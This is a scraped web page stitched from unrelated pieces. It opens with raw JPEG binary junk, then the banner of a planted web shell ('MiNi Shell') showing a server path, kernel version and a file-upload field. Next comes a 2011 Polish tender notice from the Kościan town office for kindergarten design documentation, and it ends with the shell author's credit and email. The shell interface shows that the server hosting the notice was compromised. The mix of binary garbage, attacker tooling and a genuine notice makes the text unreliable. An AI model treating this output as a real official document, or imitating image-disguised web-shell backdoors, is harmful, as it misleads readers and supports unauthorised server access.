JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110422/89040-N-2011.html

<p class="kh_header"><b>Kościan: Opracowanie dokumentacji budowlanej i wykonawczej budowy przedszkola z oddziałami żłobka na osiedlu Konstytucji 3 Maja w Kościanie w ramach realizacji zadania pn. Budowa przedszkola</b><br>
<b>Numer ogłoszenia: 89040 - 2011; data zamieszczenia: 22.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski Kościan , al. Tadeusza Kościuszki 22/204, 64-000 Kościan, woj. wielkopolskie, tel. 065 512 14 66, faks 065 5122700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koscian.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji budowlanej i wykonawczej budowy przedszkola z oddziałami żłobka na osiedlu Konstytucji 3 Maja w Kościanie w ramach realizacji zadania pn. Budowa przedszkola.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Podstawowe  informacje o przedszkolu 
    Planowane przedszkole ma z założenia zastąpić istniejące dotychczas Samorządowe Przedszkole Nr 2 w Kościanie przy ul. Moniuszki. Przewiduje się, że będzie przeznaczone dla sześciu grup przedszkolaków  -każda grupa po 25 przedszkolaków , co w sumie daje liczbę 150 dzieci. Przedszkole będzie posiadało sześć pomieszczeń do zajęć przedszkolnych; przy każdym pomieszczeniu do zajęć będą usytuowane toalety dla dzieci .  Przedszkole będzie dysponować własną  kotłownią, kuchnią, magazynami,  stołówką, szatniami, holem wykorzystywanym do organizowania uroczystości przedszkolnych, pokojem nauczycielskim, pomieszczeniami do zajęć indywidualnych, pomieszczeniami dla dyrektora , pracowników administracji i obsługi.
Ponadto częścią przedszkola będzie stanowił  wydzielony moduł składający się z dwóch pomieszczeń przeznaczonych na żłobek dla trzydzieściorga dzieci z niezbędnym  zapleczem. 
 Przedszkole będzie posiadało własny parking dla rodziców dzieci i personelu, ogród i plac zabaw.
2. Założenia dotyczące lokalizacji
Przedszkole będzie usytuowane na terenach przylegających do Os. Konstytucji 3 Maja w Kościanie. Ze względu na dowóz  dzieci samochodami, przedszkole powinno być tak usytuowane, aby  było łatwo osiągalne w ruchu drogowym, i aby dowóz dzieci nie kolidował ze zwykłym ruchem ulicznym. Za najlepszą lokalizację uznaje się taką,  przy której nie ma konieczności zawracania samochodu sprzed przedszkola, lecz można jechać dalej . Przed przedszkolem powinna być zatoka dla zatrzymujących się samochodów. 
3. Rozmieszczenie obiektów przedszkola na działce
 Oprócz budynku przedszkola  na działce powinien znajdować się plac zabaw , ogród z trawnikiem , warzywnikiem, drzewami i krzewami  oraz parking przeznaczony dla rodziców dzieci dłużej pozostających w przedszkolu  i dla personelu przedszkola. Działka , na której znajduje się przedszkole będzie ogrodzone i będzie posiadało dwie bramy wjazdowe.
     Z przodu działki - od strony ulicy- powinny znajdować się parkingi przedszkolne. Głębiej - za pasem zieleni - trawa, krzewy, drzewka- powinien być usytuowany budynek przedszkola. Jeszcze głębiej powinien znajdować się ogród  i najdalej od ulicy  - plac zabaw z wydzielonymi częściami dla dzieci starszych -4 -5 - 6 lat- oraz dzieci najmłodszych - w tym również miejsce zabawowe dla dzieci ze żłobka.
4. Wskazania  dotyczące kształtu  i kolorystyki  budynku
    Przedszkole  ma być budynkiem  nie podpiwniczonym. Zakłada się, że pomieszczenia nie przeznaczone na prowadzenie zajęć z dziećmi  mogą się znajdować w części podpiwniczonej budynku lub na pierwszym piętrze. Wejście dla dzieci i rodziców musi być pozbawione barier architektonicznych. Budynek ma być nowoczesny, swoimi  kształtami  nawiązującym do przedmiotów, które kojarzą się dzieciom z czymś wesołym i radosnym. Kolorystyka elewacji budynku powinna być  dostosowana do potrzeb dzieci.
5. Pomieszczenia wewnątrz budynku
    Wszystkie pomieszczenia do zajęć z dziećmi, toalety, szatnie, kuchnia, pomieszczenia magazynowe i biurowe muszą spełniać obowiązujące normy. Pomieszczenia w module przeznaczonym na żłobek muszą odpowiadać normom dotyczącym żłobka. Dostęp do pomieszczeń przeznaczonych dla pobytu dzieci musi być łatwy i nie może zawierać barier architektonicznych. Z pomieszczeń tych musi istnieć możliwość łatwej ewakuacji dzieci. 
6. Urządzenie otoczenia przedszkola
    W otoczeniu przedszkola powinno być dużo zieleni zarówno niskiej jak i wysokiej . Od ulicy i wewnętrznego parkingu budynek przedszkola powinien być oddzielony pasem trawy i krzewów. Za budynkiem przedszkola w ogrodzie oprócz trawników i krzewów powinno się znaleźć miejsce na drzewa wysokie. Do budynku, ogrodu i placu zabaw  powinien być zapewniony dojazd z dwóch stron drogami wewnętrznymi.
Opracowanie kompletnej dokumentacji budowlanej i wykonawczej budowy przedszkola z oddziałami żłobka na os. Konstytucji 3 Maja w Kościanie -działka nr 2948-22 o powierzchni 0,3997 ha- w ramach realizacji zadania pn. Budowa przedszkola. 
Teren na którym planowana jest lokalizacja inwestycji jest własnością Gminy Miejskiej Kościan.
1 Zakres przedmiotu zamówienia - zakres dokumentacji:
a. koncepcja architektoniczna przedszkola przedstawiona Zamawiającemu w trzech wariantach roboczych do wyboru jednego wraz z szacunkową wyceną kosztów realizacji inwestycji,
b. projekt budowlany wykonany na podstawie jednego wybranego wariantu koncepcji architektonicznej, wraz z uzyskaniem pozwolenia na budowę, opracowany zgodnie z obowiązującymi przepisami budowlanymi oraz założeniami planu zagospodarowania przestrzennego:
c. projekty wykonawcze w tym:
branża architektoniczno budowlana:
-projekt architektury z kolorystyką elewacji,
-projekt konstrukcji,
-projekt aranżacji wnętrz,
-projekt detali architektonicznych,
-projekt elementów małej architektury,
-projekt zagospodarowania terenu,
branża drogowa:
-projekt robót drogowych,
branża sanitarna:
-pojekt sieci wodno-kanalizacyjnej z przyłączami,
-projekt sieci kanalizacji deszczowej wraz z przyłączem,
-projekt przyłączy instalacji gazowej,
-projekt instalacji wewnętrznej wod-kan,
-projekt instalacji p-poż,
-projekt instalacji wentylacji i klimatyzacji,
-projekt instalacji gazowej,
-projekt instalacji c.o. 
-projekt technologii kotłowni gazowej, 
-projekt technologii kuchni,
branża elektryczna i teletechnicznej
-projekt przyłącza elektrycznoenergetycznego,
-projekt oświetlenia zewnętrznego,
-projekt instalacji oświetlenia i gniazd wtykowych,
-projekt instalacji piorunochronnej,
-projekt instalacji niskoprądowych,
-projekt instalacji teletechnicznej-
-zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02 września 2004 r.Dz. U. Nr 202 poz. 2072 ze zm
d. przedmiar robót - zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02 września 2004 r.Dz. U. Nr 202 poz. 2072 ze zm.,
e. kosztorys inwestorski opracowany zgodnie z obowiązującymi przepisami- zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. Dz. U. Nr 130 poz. 1389.
f. specyfikację techniczną wykonania i odbioru robót - zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02 września 2004 r.Dz. U. Nr 202 poz. 2072 ze zm.
g). informację bezpieczeństwa i ochrony zdrowia- zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02 września 2004 r.Dz. U. Nr 202 poz. 2072 ze zm.)
2. Ww. dokumentacja winna spełniać następujące wymagania:
a. Dokumentacja projektowo - kosztorysowa powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć, a rozwiązania technologiczne i zastosowane materiały na etapie projektowania, winny być uzgodnione z zamawiającym.
b. Będzie służyć jako opis przedmiotu zamówienia do przetargu na roboty budowlane w oparciu o ustawę Prawo zamówień publicznych oraz do realizacji -na jej podstawie- pełnego zakresu robót budowlanych niezbędnego dla
użytkowania zgodnie z przeznaczeniem;
c. W swej treści powinna określać technologię robót, użyte materiały i zastosowane urządzenia w sposób umożliwiający zachowanie uczciwej konkurencji. Powinna określać parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii i urządzeń;
d. Kompletną dokumentację projektowo-kosztorysową należy wykonać w formie papierowej i elektronicznej w następującej liczbie egzemplarzy:
-koncepcja architektoniczna - 5 egz.
-projekt budowlany - 5 egz.
-projekty wykonawcze - 4 egz.
-przedmiar robót - 2 egz.
-kosztorys inwestorski - 2 egz.
-specyfikacja techniczna wykonania i odbioru robót budowlanych - 4 egz.
-informacja dotycząca bezpieczeństwa i ochrony zdrowia - 2 egz.
3 Całość opracowania projektowego winna być zapisana w formie elektronicznej, w następującym zestawieniu:
a dla Zamawiającego - projekty, kosztorysy inwestorskie i przedmiary robót w wersji oryginalnej oraz w postaci plików zapisanych w formacie PDF,
b dla wykonawców do przetargu - projekty, specyfikacje techniczne oraz przedmiary robót w postaci plików zapisanych w formacie PDF, pliki o max. objętości do 2 MB dla wykonawców nie należy umieszczać stron z zaświadczeniami i kopiami uprawnień projektantów,
Każdy projekt, przedmiar robót, specyfikacja techniczna oraz kosztorys inwestorski mają stanowić jeden oddzielny plik w formacie PDF.
4 Ponadto w ramach przedmiotu zamówienia i ceny ofertowej wykonawca jest zobowiązany do:
a Pozyskania wszystkich dodatkowych koniecznych materiałów wyjściowych do projektowania na własny koszt i we własnym zakresie tj.:
- aktualnej mapy do celów projektowych;
- badań geotechnicznych;
- warunków technicznych przyłączenia mediów;
b Wprowadzenia wymaganych przez Zamawiającego zmian do wybranego projektu koncepcyjnego.
Architektoniczny projekt koncepcyjny opracowany w oparciu o załączone wstępne założenia - Załącznik nr 1 -wraz z wizualizacją komputerową projektowanego obiektu, po uzgodnieniu i zatwierdzeniu przez zamawiającego w zakresie podstawowych rozwiązań przestrzennych, materiałowych i architektonicznych będzie stanowił podstawę do wykonania docelowej dokumentacji projektowej.
c. Wydania oświadczenia o kompletności dokumentacji.
d. Dokonania uzgodnień międzybranżowych.
e .Sprawdzenia dokumentacji przez osoby uprawnione.
f .Wykonania wszelkich innych niezbędnych opracowań, które są konieczne do realizacji inwestycji w ramach zleconej kompleksowej dokumentacji projektowo - kosztorysowej budowy.
g.  Projekt powinien przewidywać pierwsze wyposażenie zaprojektowanych pomieszczeń.
5 Projektant zobowiązany jest do uzyskania:

- warunków  przyłączenia wody i włączenia kanalizacji do sieci ze wszystkimi uzgodnieniami,
- warunków przyłączenia do sieci gazowej ze wszystkimi uzgodnieniami,
- uzgodnień od projektantów, rzeczoznawców BHP, P-POŻ oraz Sanepid
Przy projektowaniu instalacji należy stosować nowoczesne rozwiązania ekologiczne i energooszczędne, zapewniające wymagane parametry temperaturowe, wilgotnościowe, oświetleniowe i inne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 154.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymaga się wniesienia wadium w wysokości 2.400,00 zł ( słownie : dwa tysiące czterysta złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie wiedzy i doświadczenia a w szczególności:
w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę  polegającą na opracowaniu dokumentacji projektowej wielobranżowej budynku  szkolnego lub przedszkola ( dla co najmniej 180 dzieci ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia, a w szczególności dysponuje lub  będzie dysponował co najmniej jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej, konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik także pełnomocnictwo określające zakres umocowania podpisane przez osoby uprawnione do reprezentacji wykonawcy w formie oryginału lub kopii potwierdzanej przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń: 
1.Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy. 
2.Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony. 
3.Wystąpienia konieczności zmiany osób wskazanych w ofercie -śmierć, choroba, ustania stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne od wykonawcy- przy pomocy, których Wykonawca realizuje przedmiot umowy. Przedmiotowa zmiana jest możliwa pod warunkiem zaproponowania innych osób, spełniających na dzień składania ofert, warunki określone przez zamawiającego w specyfikacji. 
4.Zmiany podwykonawcy, który zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych będzie podmiotem udostępniającym zasoby niezbędne do realizacji zamówienia. W takim przypadku Wykonawca jest zobowiązany zaproponować innego podwykonawcę spełniającego na dzień składania ofert warunki określone przez Zamawiającego w specyfikacji wraz z załączeniem wszystkich wymaganych oświadczeń i dokumentów określonych  w ogłoszeniu o zamówieniu. 
5.Zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy, a także z np. wystąpienia zwłoki w wydaniu przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń. 
6.Wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami: 
a.siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem, 
b.zmiana osób występujących w imieniu Zamawiającego i Wykonawcy.
c.zmiana obowiązującej stawki VAT, 
d.rezygnacja przez zamawiającego z realizacji części przedmiotu umowy. 
7.W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w ust. 1 do 6 termin realizacji przedmiotu umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
8.Pozostałe zmiany określone w umowie. 
9.Wszelkie zmiany do niniejszej umowy wymagają pisemnego aneksu podpisanego przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.koscian.pl w menu zamówienia publiczne - zamówienia powyżej 14 000 euro<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Kościana Al. Kościuszki 22, pokój 204.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2011 godzina 10:30, miejsce: Urząd Miejski Kościan Al. Kościuszki 22, kancelaria, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com